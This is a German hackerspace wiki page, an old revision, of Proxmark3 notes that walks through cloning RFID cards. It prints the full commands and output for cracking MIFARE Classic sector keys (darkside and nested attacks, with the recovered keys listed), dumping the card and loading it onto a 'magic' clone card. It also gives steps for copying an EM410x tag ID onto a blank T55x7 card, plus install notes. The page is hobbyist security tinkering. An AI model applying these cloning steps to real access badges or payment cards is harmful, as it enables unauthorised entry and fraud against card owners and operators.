Proxmark3

This is an old revision of the document!

Dank Jan haben wir einen wir einen proxmark3, ein Proxmark3 easy und auch 2 Chameleons,

Der RFID Koffer mit dem Zeugs, auch Karten etc. gibt es auf Anfrage bei mir

Der Proxmark 3 easy hat momentan Probleme mit Legic Prime, muss noch debugt werden.

Auf dem DL0MUC-Rechner ist die dazu passende Software installiert, Mus man mal ™ updaten.

Auf dem 34c3 haben wir damit mal weiter rumgespielt, hier noch ein paar Tips
(Bin selber zu faul das immer wieder raus zu suchen)

Einen gültigen Key herausfinden

proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average  :-)
Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
........................



uid(352c1f4c) nt(b30c6cee) par(ba92426af29a2a32) ks(0008090f0e0f070d) nr(00000000)

          
|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000000| 0 |  5  |0,1,0,1,1,1,0,1|
| 20 |00000020| 8 |  d  |0,1,0,0,1,0,0,1|
| 40 |00000040| 9 |  c  |0,1,0,0,0,0,1,0|
| 60 |00000060| f |  a  |0,1,0,1,0,1,1,0|
| 80 |00000080| e |  b  |0,1,0,0,1,1,1,1|
| a0 |000000a0| f |  a  |0,1,0,1,1,0,0,1|
| c0 |000000c0| 7 |  2  |0,1,0,1,0,1,0,0|
| e0 |000000e0| d |  8  |0,1,0,0,1,1,0,0|
key_count:1
------------------------------------------------------------------
Key found:e251a9da734d 
          
Found valid key:e251a9da734d
proxmark3>

Mit dem oben gefundenen Key, die ganzen restlichen Keys herausfinden (dauert ein bisschen)

proxmark3> hf mf nested 1 0 A e251a9da734d d
--block no:00 key type:00 key:e2 51 a9 da 73 4d  etrans:0          
Block shift=0          
Testing known keys. Sector count=16          
nested...          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=0 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=8 trgkey=0          
Found valid key:06930625f573          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=8 trgkey=1          
Found valid key:9aeb465f44c9          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=12 trgkey=0          
Found valid key:3ed2990cc0c3          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=12 trgkey=1          
Found valid key:f9e3c2b9421a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=16 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=16 trgkey=1          
Found valid key:f18ea2dcca6f          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=1          
Found valid key:6f259862ef91          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=1          
Found valid key:d412a41ecb09          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=44 trgkey=0          
Found valid key:d271ff53eeda          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=44 trgkey=1          
Found valid key:b6ca78eabb2a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=48 trgkey=0          
Found valid key:cb87a64088e7          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=48 trgkey=1          
Found valid key:0653bf2b8701          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=1          
Found valid key:541550280d7e          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=60 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=60 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=0 trgkey=1          
Found valid key:322c9cbbe53f          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=0          
Found valid key:9c8c07c9f190          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=16 trgkey=0          
Found valid key:5ed4f3654421          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=0          
Found valid key:9dec238a9214          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=1          
Found valid key:bd451e445aed          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=0          
Found valid key:472a6f5519ad          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=0          
Found valid key:cfea5408a6da          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=0          
Found valid key:a6d80a83ded6          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
Found valid key:8f0e6a510598          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
Found valid key:f3be399eba7b          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
Found valid key:5a6041c9f9fc          
Time in nested: 37,380 (0,603 sec per key)

-----------------------------------------------
Iterations count: 62

          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  e251a9da734d  | 1 |  322c9cbbe53f  | 1 |          
|001|  9c8c07c9f190  | 1 |  5a6041c9f9fc  | 1 |          
|002|  06930625f573  | 1 |  9aeb465f44c9  | 1 |          
|003|  3ed2990cc0c3  | 1 |  f9e3c2b9421a  | 1 |          
|004|  5ed4f3654421  | 1 |  f18ea2dcca6f  | 1 |          
|005|  cfea5408a6da  | 1 |  6f259862ef91  | 1 |          
|006|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|007|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|008|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|009|  8f0e6a510598  | 1 |  d412a41ecb09  | 1 |          
|010|  9dec238a9214  | 1 |  bd451e445aed  | 1 |          
|011|  d271ff53eeda  | 1 |  b6ca78eabb2a  | 1 |          
|012|  cb87a64088e7  | 1 |  0653bf2b8701  | 1 |          
|013|  a6d80a83ded6  | 1 |  541550280d7e  | 1 |          
|014|  472a6f5519ad  | 1 |  f3be399eba7b  | 1 |          
|015|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to bynary file dumpkeys.bin...
proxmark3>

Den Inhalt der Karte unter Zuhilfenahme der gefunden Keys dumpen

proxmark3> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
|-----------------------------------------|          
|----- Dumping all blocks to file... -----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin' 
proxmark3>

Den entstandenen Dump ins eml-Format konvertieren (PM3-Scripts sind am Ende der Seite in den Downloads)

user@host:~$ ./pm3_bin2eml.py dumpdata.bin dumpdata.eml

Das eml-File in eine “Magic Chinese Guy”-Karte laden (diese vorher natürlich auf den proxmark legen!)

proxmark3> hf mf cload dumpdata
Loaded from file: dumpdata.eml          
proxmark3>

Fertig

Karte auslesen

proxmark3> lf em4x em410xwatch
#db# buffer samples: d1 cd c5 c0 ba b7 b2 af ...                 
Reading 16000 samples
          
Done!
          
Auto-detected clock rate: 64          
EM410x Tag ID: 0101160061          
Unique Tag ID: 0808860068          
proxmark3>

UID (hier: EM410x Tag ID) auf Blankokarte (T5555 oder T55x7) schreiben

proxmark3> lf em4x em410xwrite 0101160061 1
Writing T55x7 tag with UID 0x0101160061 (clock rate: 64)          
#db# Started writing T55x7 tag ...                 
#db# Clock rate: 64                 
#db# Tag T55x7 written with 0xff806018d8003060

Fertig

0x51243648
0x000D8787

lf t55xx writeblockPWD 00148041 0 51243648

prox.rar (Quelle: http://www.fuzzysecurity.com/)
Proxmark-Firmware/Client, etc.: https://code.google.com/p/proxmark3/wiki/Linux

Homebrew Install (Im Terminal Fenster starten)

/usr/bin/ruby -e “$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)”

* Proxmark Install

brew tap proxmark/proxmark3
brew install proxmark3

Momentan kaputt (Stand 15.1.2018) dann mit diesem Parameter Installieren.

brew install --HEAD proxmark3

* TTY Port heraus finden (proxmark3 vorher anschließen)

ls /dev/cu*

* Starten (usbmodem21 wars bei mir, entsprechend anpassen)

proxmark3 /dev/cu.usbmodem21

* Alle proxmark Befehle laufen ab hier ganz normal

Im client/Makefile dashier ändern:

  CXXFLAGS = $(shell pkg-config --cflags QtCore QtGui 2>/dev/null) -Wall -O4
  QTLDLIBS = $(shell pkg-config --libs QtCore QtGui 2>/dev/null)
  MOC = /usr/lib/x86_64-linux-gnu/qt4/bin/moc

Proxmark3

Mifare todo bei Jan

Mifare Cloning

EM410x Cloning

EM410x Known Passwords

Downloads

Jans MAC Debugging

Debugging

Make-Fehler unter (u.a.) Ubuntu